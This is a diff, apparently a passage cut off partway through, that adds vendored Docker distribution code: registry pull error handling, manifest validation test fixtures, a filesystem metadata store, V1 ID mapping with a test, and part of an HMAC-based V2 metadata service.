@@ -0,0 +1,159 @@
+package distribution
+
+import (
+	"net/url"
+	"strings"
+	"syscall"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/registry/api/errcode"
+	"github.com/docker/distribution/registry/api/v2"
+	"github.com/docker/distribution/registry/client"
+	"github.com/docker/distribution/registry/client/auth"
+	"github.com/docker/docker/distribution/xfer"
+	"github.com/docker/docker/reference"
+	"github.com/pkg/errors"
+)
+
+// ErrNoSupport is an error type used for errors indicating that an operation
+// is not supported. It encapsulates a more specific error.
+type ErrNoSupport struct{ Err error }
+
+func (e ErrNoSupport) Error() string {
+	if e.Err == nil {
+		return "not supported"
+	}
+	return e.Err.Error()
+}
+
+// fallbackError wraps an error that can possibly allow fallback to a different
+// endpoint.
+type fallbackError struct {
+	// err is the error being wrapped.
+	err error
+	// confirmedV2 is set to true if it was confirmed that the registry
+	// supports the v2 protocol. This is used to limit fallbacks to the v1
+	// protocol.
+	confirmedV2 bool
+	// transportOK is set to true if we managed to speak HTTP with the
+	// registry. This confirms that we're using appropriate TLS settings
+	// (or lack of TLS).
+	transportOK bool
+}
+
+// Error renders the FallbackError as a string.
+func (f fallbackError) Error() string {
+	return f.Cause().Error()
+}
+
+func (f fallbackError) Cause() error {
+	return f.err
+}
+
+// shouldV2Fallback returns true if this error is a reason to fall back to v1.
+func shouldV2Fallback(err errcode.Error) bool {
+	switch err.Code {
+	case errcode.ErrorCodeUnauthorized, v2.ErrorCodeManifestUnknown, v2.ErrorCodeNameUnknown:
+		return true
+	}
+	return false
+}
+
+// TranslatePullError is used to convert an error from a registry pull
+// operation to an error representing the entire pull operation. Any error
+// information which is not used by the returned error gets output to
+// log at info level.
+func TranslatePullError(err error, ref reference.Named) error {
+	switch v := err.(type) {
+	case errcode.Errors:
+		if len(v) != 0 {
+			for _, extra := range v[1:] {
+				logrus.Infof("Ignoring extra error returned from registry: %v", extra)
+			}
+			return TranslatePullError(v[0], ref)
+		}
+	case errcode.Error:
+		var newErr error
+		switch v.Code {
+		case errcode.ErrorCodeDenied:
+			// ErrorCodeDenied is used when access to the repository was denied
+			newErr = errors.Errorf("repository %s not found: does not exist or no pull access", ref.Name())
+		case v2.ErrorCodeManifestUnknown:
+			newErr = errors.Errorf("manifest for %s not found", ref.String())
+		case v2.ErrorCodeNameUnknown:
+			newErr = errors.Errorf("repository %s not found", ref.Name())
+		}
+		if newErr != nil {
+			logrus.Infof("Translating %q to %q", err, newErr)
+			return newErr
+		}
+	case xfer.DoNotRetry:
+		return TranslatePullError(v.Err, ref)
+	}
+
+	return err
+}
+
+// continueOnError returns true if we should fallback to the next endpoint
+// as a result of this error.
+func continueOnError(err error) bool {
+	switch v := err.(type) {
+	case errcode.Errors:
+		if len(v) == 0 {
+			return true
+		}
+		return continueOnError(v[0])
+	case ErrNoSupport:
+		return continueOnError(v.Err)
+	case errcode.Error:
+		return shouldV2Fallback(v)
+	case *client.UnexpectedHTTPResponseError:
+		return true
+	case ImageConfigPullError:
+		return false
+	case error:
+		return !strings.Contains(err.Error(), strings.ToLower(syscall.ENOSPC.Error()))
+	}
+	// let's be nice and fallback if the error is a completely
+	// unexpected one.
+	// If new errors have to be handled in some way, please
+	// add them to the switch above.
+	return true
+}
+
+// retryOnError wraps the error in xfer.DoNotRetry if we should not retry the
+// operation after this error.
+func retryOnError(err error) error {
+	switch v := err.(type) {
+	case errcode.Errors:
+		if len(v) != 0 {
+			return retryOnError(v[0])
+		}
+	case errcode.Error:
+		switch v.Code {
+		case errcode.ErrorCodeUnauthorized, errcode.ErrorCodeUnsupported, errcode.ErrorCodeDenied, errcode.ErrorCodeTooManyRequests, v2.ErrorCodeNameUnknown:
+			return xfer.DoNotRetry{Err: err}
+		}
+	case *url.Error:
+		switch v.Err {
+		case auth.ErrNoBasicAuthCredentials, auth.ErrNoToken:
+			return xfer.DoNotRetry{Err: v.Err}
+		}
+		return retryOnError(v.Err)
+	case *client.UnexpectedHTTPResponseError:
+		return xfer.DoNotRetry{Err: err}
+	case error:
+		if err == distribution.ErrBlobUnknown {
+			return xfer.DoNotRetry{Err: err}
+		}
+		if strings.Contains(err.Error(), strings.ToLower(syscall.ENOSPC.Error())) {
+			return xfer.DoNotRetry{Err: err}
+		}
+	}
+	// let's be nice and fallback if the error is a completely
+	// unexpected one.
+	// If new errors have to be handled in some way, please
+	// add them to the switch above.
+	return err
+}
diff --git a/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/bad_manifest b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/bad_manifest
new file mode 100644
index 0000000000..a1f02a62a3
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/bad_manifest
@@ -0,0 +1,38 @@
+{
+   "schemaVersion": 2,
+   "name": "library/hello-world",
+   "tag": "latest",
+   "architecture": "amd64",
+   "fsLayers": [
+      {
+         "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
+      },
+      {
+         "blobSum": "sha256:03f4658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb"
+      }
+   ],
+   "history": [
+      {
+         "v1Compatibility": "{\"id\":\"af340544ed62de0680f441c71fa1a80cb084678fed42bae393e543faea3a572c\",\"parent\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.608577814Z\",\"container\":\"c2b715156f640c7ac7d98472ea24335aba5432a1323a3bb722697e6d37ef794f\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) CMD [\\\"/hello\\\"]\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/hello\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"
+      },
+      {
+         "v1Compatibility": "{\"id\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.241352727Z\",\"container\":\"9aeb0006ffa72a8287564caaea87625896853701459261d3b569e320c0c9d5dc\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:4abd3bff60458ca3b079d7b131ce26b2719055a030dfa96ff827da2b7c7038a7 in /\"],\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":null,\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":960}\n"
+      }
+   ],
+   "signatures": [
+      {
+         "header": {
+            "jwk": {
+               "crv": "P-256",
+               "kid": "OIH7:HQFS:44FK:45VB:3B53:OIAG:TPL4:ATF5:6PNE:MGHN:NHQX:2GE4",
+               "kty": "EC",
+               "x": "Cu_UyxwLgHzE9rvlYSmvVdqYCXY42E9eNhBb0xNv0SQ",
+               "y": "zUsjWJkeKQ5tv7S-hl1Tg71cd-CqnrtiiLxSi6N_yc8"
+            },
+            "alg": "ES256"
+         },
+         "signature": "Y6xaFz9Sy-OtcnKQS1Ilq3Dh8cu4h3nBTJCpOTF1XF7vKtcxxA_xMP8-SgDo869SJ3VsvgPL9-Xn-OoYG2rb1A",
+         "protected": "eyJmb3JtYXRMZW5ndGgiOjMxOTcsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAxNS0wOS0xMVQwNDoxMzo0OFoifQ"
+      }
+   ]
+}
diff --git a/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/extra_data_manifest b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/extra_data_manifest
new file mode 100644
index 0000000000..beec19a801
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/extra_data_manifest
@@ -0,0 +1,46 @@
+{
+   "schemaVersion": 1,
+   "name": "library/hello-world",
+   "tag": "latest",
+   "architecture": "amd64",
+   "fsLayers": [
+      {
+         "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
+      },
+      {
+         "blobSum": "sha256:03f4658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb"
+      }
+   ],
+   "history": [
+      {
+         "v1Compatibility": "{\"id\":\"af340544ed62de0680f441c71fa1a80cb084678fed42bae393e543faea3a572c\",\"parent\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.608577814Z\",\"container\":\"c2b715156f640c7ac7d98472ea24335aba5432a1323a3bb722697e6d37ef794f\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) CMD [\\\"/hello\\\"]\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/hello\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"
+      },
+      {
+         "v1Compatibility": "{\"id\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.241352727Z\",\"container\":\"9aeb0006ffa72a8287564caaea87625896853701459261d3b569e320c0c9d5dc\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:4abd3bff60458ca3b079d7b131ce26b2719055a030dfa96ff827da2b7c7038a7 in /\"],\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":null,\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":960}\n"
+      }
+   ],
+   "fsLayers": [
+      {
+         "blobSum": "sha256:ffff95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
+      },
+      {
+         "blobSum": "sha256:ffff658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb"
+      }
+   ],
+   "signatures": [
+      {
+         "header": {
+            "jwk": {
+               "crv": "P-256",
+               "kid": "OIH7:HQFS:44FK:45VB:3B53:OIAG:TPL4:ATF5:6PNE:MGHN:NHQX:2GE4",
+               "kty": "EC",
+               "x": "Cu_UyxwLgHzE9rvlYSmvVdqYCXY42E9eNhBb0xNv0SQ",
+               "y": "zUsjWJkeKQ5tv7S-hl1Tg71cd-CqnrtiiLxSi6N_yc8"
+            },
+            "alg": "ES256"
+         },
+         "signature": "Y6xaFz9Sy-OtcnKQS1Ilq3Dh8cu4h3nBTJCpOTF1XF7vKtcxxA_xMP8-SgDo869SJ3VsvgPL9-Xn-OoYG2rb1A",
+         "protected": "eyJmb3JtYXRMZW5ndGgiOjMxOTcsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAxNS0wOS0xMVQwNDoxMzo0OFoifQ"
+      }
+   ]
+}
diff --git a/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/good_manifest b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/good_manifest
new file mode 100644
index 0000000000..b107de3226
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/good_manifest
@@ -0,0 +1,38 @@
+{
+   "schemaVersion": 1,
+   "name": "library/hello-world",
+   "tag": "latest",
+   "architecture": "amd64",
+   "fsLayers": [
+      {
+         "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
+      },
+      {
+         "blobSum": "sha256:03f4658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb"
+      }
+   ],
+   "history": [
+      {
+         "v1Compatibility": "{\"id\":\"af340544ed62de0680f441c71fa1a80cb084678fed42bae393e543faea3a572c\",\"parent\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.608577814Z\",\"container\":\"c2b715156f640c7ac7d98472ea24335aba5432a1323a3bb722697e6d37ef794f\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) CMD [\\\"/hello\\\"]\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/hello\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"
+      },
+      {
+         "v1Compatibility": "{\"id\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.241352727Z\",\"container\":\"9aeb0006ffa72a8287564caaea87625896853701459261d3b569e320c0c9d5dc\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:4abd3bff60458ca3b079d7b131ce26b2719055a030dfa96ff827da2b7c7038a7 in /\"],\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":null,\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":960}\n"
+      }
+   ],
+   "signatures": [
+      {
+         "header": {
+            "jwk": {
+               "crv": "P-256",
+               "kid": "OIH7:HQFS:44FK:45VB:3B53:OIAG:TPL4:ATF5:6PNE:MGHN:NHQX:2GE4",
+               "kty": "EC",
+               "x": "Cu_UyxwLgHzE9rvlYSmvVdqYCXY42E9eNhBb0xNv0SQ",
+               "y": "zUsjWJkeKQ5tv7S-hl1Tg71cd-CqnrtiiLxSi6N_yc8"
+            },
+            "alg": "ES256"
+         },
+         "signature": "Y6xaFz9Sy-OtcnKQS1Ilq3Dh8cu4h3nBTJCpOTF1XF7vKtcxxA_xMP8-SgDo869SJ3VsvgPL9-Xn-OoYG2rb1A",
+         "protected": "eyJmb3JtYXRMZW5ndGgiOjMxOTcsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAxNS0wOS0xMVQwNDoxMzo0OFoifQ"
+      }
+   ]
+}
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/distribution/metadata/metadata.go b/vendor/github.com/docker/docker/distribution/metadata/metadata.go
new file mode 100644
index 0000000000..05ba4f817d
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/metadata/metadata.go
@@ -0,0 +1,75 @@
+package metadata
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"sync"
+
+	"github.com/docker/docker/pkg/ioutils"
+)
+
+// Store implements a K/V store for mapping distribution-related IDs
+// to on-disk layer IDs and image IDs. The namespace identifies the type of
+// mapping (i.e. "v1ids" or "artifacts"). MetadataStore is goroutine-safe.
+type Store interface {
+	// Get retrieves data by namespace and key.
+	Get(namespace string, key string) ([]byte, error)
+	// Set writes data indexed by namespace and key.
+	Set(namespace, key string, value []byte) error
+	// Delete removes data indexed by namespace and key.
+	Delete(namespace, key string) error
+}
+
+// FSMetadataStore uses the filesystem to associate metadata with layer and
+// image IDs.
+type FSMetadataStore struct {
+	sync.RWMutex
+	basePath string
+}
+
+// NewFSMetadataStore creates a new filesystem-based metadata store.
+func NewFSMetadataStore(basePath string) (*FSMetadataStore, error) {
+	if err := os.MkdirAll(basePath, 0700); err != nil {
+		return nil, err
+	}
+	return &FSMetadataStore{
+		basePath: basePath,
+	}, nil
+}
+
+func (store *FSMetadataStore) path(namespace, key string) string {
+	return filepath.Join(store.basePath, namespace, key)
+}
+
+// Get retrieves data by namespace and key. The data is read from a file named
+// after the key, stored in the namespace's directory.
+func (store *FSMetadataStore) Get(namespace string, key string) ([]byte, error) {
+	store.RLock()
+	defer store.RUnlock()
+
+	return ioutil.ReadFile(store.path(namespace, key))
+}
+
+// Set writes data indexed by namespace and key. The data is written to a file
+// named after the key, stored in the namespace's directory.
+func (store *FSMetadataStore) Set(namespace, key string, value []byte) error {
+	store.Lock()
+	defer store.Unlock()
+
+	path := store.path(namespace, key)
+	if err := os.MkdirAll(filepath.Dir(path), 0755); err != nil {
+		return err
+	}
+	return ioutils.AtomicWriteFile(path, value, 0644)
+}
+
+// Delete removes data indexed by namespace and key. The data file named after
+// the key, stored in the namespace's directory is deleted.
+func (store *FSMetadataStore) Delete(namespace, key string) error {
+	store.Lock()
+	defer store.Unlock()
+
+	path := store.path(namespace, key)
+	return os.Remove(path)
+}
diff --git a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go
new file mode 100644
index 0000000000..f262d4dc34
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go
@@ -0,0 +1,51 @@
+package metadata
+
+import (
+	"github.com/docker/docker/image/v1"
+	"github.com/docker/docker/layer"
+	"github.com/pkg/errors"
+)
+
+// V1IDService maps v1 IDs to layers on disk.
+type V1IDService struct {
+	store Store
+}
+
+// NewV1IDService creates a new V1 ID mapping service.
+func NewV1IDService(store Store) *V1IDService {
+	return &V1IDService{
+		store: store,
+	}
+}
+
+// namespace returns the namespace used by this service.
+func (idserv *V1IDService) namespace() string {
+	return "v1id"
+}
+
+// Get finds a layer by its V1 ID.
+func (idserv *V1IDService) Get(v1ID, registry string) (layer.DiffID, error) {
+	if idserv.store == nil {
+		return "", errors.New("no v1IDService storage")
+	}
+	if err := v1.ValidateID(v1ID); err != nil {
+		return layer.DiffID(""), err
+	}
+
+	idBytes, err := idserv.store.Get(idserv.namespace(), registry+","+v1ID)
+	if err != nil {
+		return layer.DiffID(""), err
+	}
+	return layer.DiffID(idBytes), nil
+}
+
+// Set associates an image with a V1 ID.
+func (idserv *V1IDService) Set(v1ID, registry string, id layer.DiffID) error {
+	if idserv.store == nil {
+		return nil
+	}
+	if err := v1.ValidateID(v1ID); err != nil {
+		return err
+	}
+	return idserv.store.Set(idserv.namespace(), registry+","+v1ID, []byte(id))
+}
diff --git a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go
new file mode 100644
index 0000000000..556886581e
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go
@@ -0,0 +1,83 @@
+package metadata
+
+import (
+	"io/ioutil"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/layer"
+)
+
+func TestV1IDService(t *testing.T) {
+	tmpDir, err := ioutil.TempDir("", "v1-id-service-test")
+	if err != nil {
+		t.Fatalf("could not create temp dir: %v", err)
+	}
+	defer os.RemoveAll(tmpDir)
+
+	metadataStore, err := NewFSMetadataStore(tmpDir)
+	if err != nil {
+		t.Fatalf("could not create metadata store: %v", err)
+	}
+	v1IDService := NewV1IDService(metadataStore)
+
+	testVectors := []struct {
+		registry string
+		v1ID     string
+		layerID  layer.DiffID
+	}{
+		{
+			registry: "registry1",
+			v1ID:     "f0cd5ca10b07f35512fc2f1cbf9a6cefbdb5cba70ac6b0c9e5988f4497f71937",
+			layerID:  layer.DiffID("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"),
+		},
+		{
+			registry: "registry2",
+			v1ID:     "9e3447ca24cb96d86ebd5960cb34d1299b07e0a0e03801d90b9969a2c187dd6e",
+			layerID:  layer.DiffID("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa"),
+		},
+		{
+			registry: "registry1",
+			v1ID:     "9e3447ca24cb96d86ebd5960cb34d1299b07e0a0e03801d90b9969a2c187dd6e",
+			layerID:  layer.DiffID("sha256:03f4658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb"),
+		},
+	}
+
+	// Set some associations
+	for _, vec := range testVectors {
+		err := v1IDService.Set(vec.v1ID, vec.registry, vec.layerID)
+		if err != nil {
+			t.Fatalf("error calling Set: %v", err)
+		}
+	}
+
+	// Check the correct values are read back
+	for _, vec := range testVectors {
+		layerID, err := v1IDService.Get(vec.v1ID, vec.registry)
+		if err != nil {
+			t.Fatalf("error calling Get: %v", err)
+		}
+		if layerID != vec.layerID {
+			t.Fatal("Get returned incorrect layer ID")
+		}
+	}
+
+	// Test Get on a nonexistent entry
+	_, err = v1IDService.Get("82379823067823853223359023576437723560923756b03560378f4497753917", "registry1")
+	if err == nil {
+		t.Fatal("expected error looking up nonexistent entry")
+	}
+
+	// Overwrite one of the entries and read it back
+	err = v1IDService.Set(testVectors[0].v1ID, testVectors[0].registry, testVectors[1].layerID)
+	if err != nil {
+		t.Fatalf("error calling Set: %v", err)
+	}
+	layerID, err := v1IDService.Get(testVectors[0].v1ID, testVectors[0].registry)
+	if err != nil {
+		t.Fatalf("error calling Get: %v", err)
+	}
+	if layerID != testVectors[1].layerID {
+		t.Fatal("Get returned incorrect layer ID")
+	}
+}
diff --git a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go
new file mode 100644
index 0000000000..02d1b4ad21
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go
@@ -0,0 +1,241 @@
+package metadata
+
+import (
+	"crypto/hmac"
+	"crypto/sha256"
+	"encoding/hex"
+	"encoding/json"
+	"errors"
+
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/layer"
+)
+
+// V2MetadataService maps layer IDs to a set of known metadata for
+// the layer.
+type V2MetadataService interface {
+	GetMetadata(diffID layer.DiffID) ([]V2Metadata, error)
+	GetDiffID(dgst digest.Digest) (layer.DiffID, error)
+	Add(diffID layer.DiffID, metadata V2Metadata) error
+	TagAndAdd(diffID layer.DiffID, hmacKey []byte, metadata V2Metadata) error
+	Remove(metadata V2Metadata) error
+}
+
+// v2MetadataService implements V2MetadataService
+type v2MetadataService struct {
+	store Store
+}
+
+var _ V2MetadataService = &v2MetadataService{}
+
+// V2Metadata contains the digest and source repository information for a layer.
+type V2Metadata struct {
+	Digest           digest.Digest
+	SourceRepository string
+	// HMAC hashes above attributes with recent authconfig digest used as a key in order to determine matching
+	// metadata entries accompanied by the same credentials without actually exposing them.
+	HMAC string
+}
+
+// CheckV2MetadataHMAC return true if the given "meta" is tagged with a hmac hashed by the given "key".
+func CheckV2MetadataHMAC(meta *V2Metadata, key []byte) bool {
+	if len(meta.HMAC) == 0 || len(key) == 0 {
+		return len(meta.HMAC) == 0 && len(key) == 0
+	}
+	mac := hmac.New(sha256.New, key)
+	mac.Write([]byte(meta.Digest))
+	mac.Write([]byte(meta.SourceRepository))
+	expectedMac := mac.Sum(nil)
+
+	storedMac, err := hex.DecodeString(meta.HMAC)
+	if err != nil {
+		return false
+	}
+
+	return hmac.Equal(storedMac, expectedMac)
+}
+
+// ComputeV2MetadataHMAC returns a hmac for the given "meta" hash by the given key.
+func ComputeV2MetadataHMAC(key []byte, meta *V2Metadata) string {
+	if len(key) == 0 || meta == nil {
+		return ""
+	}
+	mac := hmac.New(sha256.New, key)
+	mac.Write([]byte(meta.Digest))
+	mac.Write([]byte(meta.SourceRepository))
+	return hex.EncodeToString(mac.Sum(nil))
+}
+
+// ComputeV2MetadataHMACKey returns a key for the given "authConfig" that can be used to hash v2 metadata
+// entries.
+func ComputeV2MetadataHMACKey(authConfig *types.AuthConfig) ([]byte, error) {
+	if authConfig == nil {
+		return nil, nil
+	}
+	key := authConfigKeyInput{
+		Username:      authConfig.Username,
+		Password:      authConfig.Password,
+		Auth:          authConfig.Auth,
+		IdentityToken: authConfig.IdentityToken,
+		RegistryToken: authConfig.RegistryToken,
+	}
+	buf, err := json.Marshal(&key)
+	if err != nil {
+		return nil, err
+	}
+	return []byte(digest.FromBytes([]byte(buf))), nil
+}
+
